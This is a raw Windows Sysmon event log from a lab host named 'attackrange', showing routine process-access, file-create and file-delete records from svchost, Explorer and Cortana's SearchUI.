10341000x80000000000000006456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.063{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+baba5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000006447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.063{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+baba5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000006446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.063{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.063{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000006676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-03-31 12:02:30.994 11241100x80000000000000006675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-03-31 12:02:30.978 23542300x80000000000000006662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.978{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-03-31 12:02:30.978 11241100x80000000000000006660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-03-31 12:02:30.963 23542300x80000000000000006659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-03-31 12:02:30.963 11241100x80000000000000006657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-03-31 12:02:30.963 23542300x80000000000000006656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-03-31 12:02:30.963 11241100x80000000000000006654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-03-31 12:02:30.963 23542300x80000000000000006653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
